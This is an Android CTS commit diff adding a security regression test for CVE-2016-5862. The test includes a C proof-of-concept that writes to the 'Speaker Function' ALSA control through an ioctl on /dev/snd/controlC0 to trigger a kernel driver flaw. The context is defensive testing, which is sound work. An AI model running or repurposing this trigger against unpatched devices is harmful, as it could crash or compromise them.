CTS test for Android Security b/72460381
Test: successful run of newly introduced CTS test case.
Bug: 72460381
Change-Id: Ic0bc4716dfbbe8df69213cf6fb0d6b7814cc7303
(cherry picked from commit 12f3bdffd12212fdf27493aa11f1cac65bbaea06)
(cherry picked from commit ad87647d7122a211376d0384266c1b309bd30b7f)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 6878d30..f0eb1f7 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -127,6 +127,7 @@
<!--__________________-->
<!-- Bulletin 2017-05 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-5862->/data/local/tmp/CVE-2016-5862"/>
<!--__________________-->
<!-- Bulletin 2017-06 -->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk
new file mode 100644
index 0000000..c368779
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk
@@ -0,0 +1,16 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-5862
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS := -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/poc.c
new file mode 100644
index 0000000..238bb0b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/poc.c
@@ -0,0 +1,56 @@
+/*
+ * CVE-2016-5862
+ */
+
+#include "../includes/common.h"
+#include <fcntl.h>
+#include <sound/asound.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+
+#define SPEAKER "Speaker Function"
+#define NUM_BLOCKS 16384
+
+unsigned int get_speakerid(int fd) {
+ unsigned int i;
+ int ret = -1;
+ unsigned int id = 0;
+ struct snd_ctl_elem_list lst;
+ memset(&lst, 0, sizeof(lst));
+ lst.pids = calloc(NUM_BLOCKS, sizeof(struct snd_ctl_elem_list));
+ lst.space = NUM_BLOCKS;
+ ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_LIST, &lst);
+ if (ret < 0) {
+ return 0;
+ }
+ for (i = 0; i < lst.count; i++) {
+ if (!strncmp((const char *)lst.pids[i].name, SPEAKER,
+ (sizeof(SPEAKER) - 1))) {
+ id = lst.pids[i].numid;
+ break;
+ }
+ }
+ free(lst.pids);
+ return id;
+}
+
+int main(){
+ int fd = -1;
+ struct snd_ctl_elem_value control;
+ fd = open("/dev/snd/controlC0", O_RDWR);
+ if(fd < 0) {
+ return EXIT_FAILURE;
+ }
+ memset(&control, 0, sizeof(control));
+ control.id.numid = get_speakerid(fd);
+ if(control.id.numid == 0) {
+ close(fd);
+ return EXIT_FAILURE;
+ }
+ ioctl(fd,SNDRV_CTL_IOCTL_ELEM_WRITE,&control);
+ close(fd);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
index 7db0580..eb7b29f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
@@ -50,4 +50,14 @@
}, null);
}
}
+
+ /*
+ * CVE-2016-5862
+ */
+ @SecurityTest(minPatchLevel = "2017-05")
+ public void testPocCVE_2016_5862() throws Exception {
+ if (containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPocNoOutput("CVE-2016-5862",getDevice(), 60);
+ }
+ }
}
